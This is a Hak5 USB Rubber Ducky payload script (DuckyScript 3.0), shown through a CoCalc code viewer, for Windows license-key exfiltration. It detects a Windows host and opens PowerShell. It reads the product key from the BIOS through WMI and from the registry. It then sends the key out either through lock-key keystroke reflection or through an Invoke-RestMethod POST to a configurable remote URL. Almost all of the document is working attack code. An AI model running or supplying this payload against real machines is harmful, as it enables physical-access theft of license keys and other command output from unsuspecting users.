Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt
2968 views
1
REM       WindowsLicenseKeyExfiltration

2
REM       Version 1.0

3
REM       OS: Windows

4
REM       Author: 0i41E

5
REM       Requirement: DuckyScript 3.0

6
REM       This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry.

7


8
REM Extension made by Korben for checking if Target is Windows OS

9
EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT

10
    REM VERSION 1.1

11
    REM AUTHOR: Korben

12


13
    REM_BLOCK DOCUMENTATION

14
        Windows fully passive OS Detection and passive Detect Ready

15
        Includes its own passive detect ready.

16
        Does not require additional extensions.

17


18
        USAGE:

19
            Extension runs inline (here)

20
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic

21
            boot delay

22
            $_OS will be set to WINDOWS or NOT_WINDOWS

23
            See end of payload for usage within payload

24
    END_REM

25


26
    REM CONFIGURATION:

27
    DEFINE #MAX_WAIT 150

28
    DEFINE #CHECK_INTERVAL 20

29
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2

30
    DEFINE #NOT_WINDOWS 7

31


32
    $_OS = #NOT_WINDOWS

33


34
    VAR $MAX_TRIES = #MAX_WAIT

35
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

36
        DELAY #CHECK_INTERVAL

37
        $MAX_TRIES = ($MAX_TRIES - 1)

38
    END_WHILE

39
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN

40
        $_OS = WINDOWS

41
    END_IF

42


43
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION

44
        IF ($_OS == WINDOWS) THEN

45
            STRING HELLO WINDOWS!

46
        ELSE

47
            STRING HELLO WORLD!

48
        END_IF

49
    END_REM

50
END_EXTENSION

51


52
REM Extension made by 0i41E to signalize the payloads end

53
EXTENSION DETECT_FINISHED

54
    REM VERSION 1.0

55
    REM AUTHOR: 0i41E

56


57
    REM_BLOCK DOCUMENTATION

58
        USAGE:

59
            Use the function Detect_Finished() to signal the finished execution of your payload.

60
    END_REM

61


62
    REM CONFIGURATION:

63
    DEFINE #PAUSE 150

64
    FUNCTION Detect_Finished()

65
        IF ($_CAPSLOCK_ON == FALSE)

66
            CAPSLOCK

67
            DELAY #PAUSE

68
            CAPSLOCK

69
            DELAY #PAUSE

70
            CAPSLOCK

71
            DELAY #PAUSE

72
            CAPSLOCK

73
            ATTACKMODE OFF

74
        ELSE IF

75
            CAPSLOCK

76
            DELAY #PAUSE

77
            CAPSLOCK

78
            DELAY #PAUSE

79
            CAPSLOCK

80
            ATTACKMODE OFF

81
        END_IF

82
    END_FUNCTION

83
END_EXTENSION

84


85
REM Extension made by 0i41E for fileless exfiltration via Lock Keys

86
EXTENSION WINDOWS_FILELESS_HID_EXFIL

87
    REM VERSION 1.0

88
    REM AUTHOR: 0i41E

89


90
    REM_BLOCK DOCUMENTATION

91
        Extension for Keystroke Reflection data exfiltration without putting files on disk.

92
        This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.

93


94
        TARGET:

95
            Windows Hosts that supports powershell and SendKeys

96


97
        USAGE:

98
            Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.

99
            It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.

100


101
        Example Usage:

102
            GUI r

103
            DELAY 500

104
            STRINGLN powershell

105
            DELAY 1000

106
            STRING echo "This is my test"

107
            Windows_Fileless_HID_Exfil()

108
    END_REM

109


110
    FUNCTION Windows_Fileless_HID_Exfil()

111
        DELAY 250

112
        REM Saving current Keyboard lock keys

113
        SAVE_HOST_KEYBOARD_LOCK_STATE

114
        $_EXFIL_MODE_ENABLED = TRUE

115
        $_EXFIL_LEDS_ENABLED = TRUE

116
        DELAY 500

117
        REM Setting the output as variable

118
        STRING |Out-String|Set-Variable -Name "DD";

119
        REM Converting output into Lock Key values

120
        STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';

121
        REM Exfiltrating via Keystroke Reflection

122
        STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit

123
        REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.

124
        WAIT_FOR_SCROLL_CHANGE

125
        LED_G

126
        $_EXFIL_MODE_ENABLED = FALSE

127
        RESTORE_HOST_KEYBOARD_LOCK_STATE

128
    END_FUNCTION

129
END_EXTENSION

130


131
REM If set to TRUE, keys will be send via PowerShells Invoke-Restmethod

132
DEFINE #REMOTE_EXFIL FALSE

133
REM Define the remote host to which the keys shall be send to. (Only when REMOTE_EXFIL is set to TRUE!)

134
DEFINE #URL https://example.com/

135


136
REM If Target is Windows, execute payload

137
IF ($_OS == WINDOWS) THEN

138
    GUI r

139
    DELAY 500

140
    STRINGLN powershell -nop -noni

141
    DELAY 1000

142
    STRINGLN Write-Host "[+]Attempting exfiltration of Windows Product Keys..." -ForegroundColor Green

143
    DELAY 300

144
REM Dumping License key when saved in Bios

145
    STRING $Get_License = "echo 'Product Key in Bios:';(Get-WmiObject -query 'select * from SoftwareLicensingService').OA3xOriginalProductKey;

146
REM Dumping License key via registry

147
    STRING Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -name BackupProductKeyDefault | Select-Object BackupProductKeyDefault"

148
REM Executing Get_License

149
    STRING ;IeX $Get_License

150


151
REM If REMOTE_EXFIL is set to TRUE,exfiltrate keys to remote host

152
    IF_DEFINED_TRUE #REMOTE_EXFIL

153
            DELAY 500

154
REM Setting the output as variable & sending it to defined remote host

155
            STRINGLN |Out-String|Set-Variable -Name "DD";Invoke-Restmethod -UseBasicParsing -Method Post -Uri "#URL" -Body $DD;exit

156
            DELAY 150

157
            Detect_Finished()

158
    ELSE_DEFINED

159
REM Exfiltrating License key via Keystroke Reflection

160
            Windows_Fileless_HID_Exfil()

161
            DELAY 150

162
            Detect_Finished()

163
    END_IF_DEFINED

164
REM If System is not Windows...

165
ELSE

166
    ATTACKMODE STORAGE

167
END_IF

168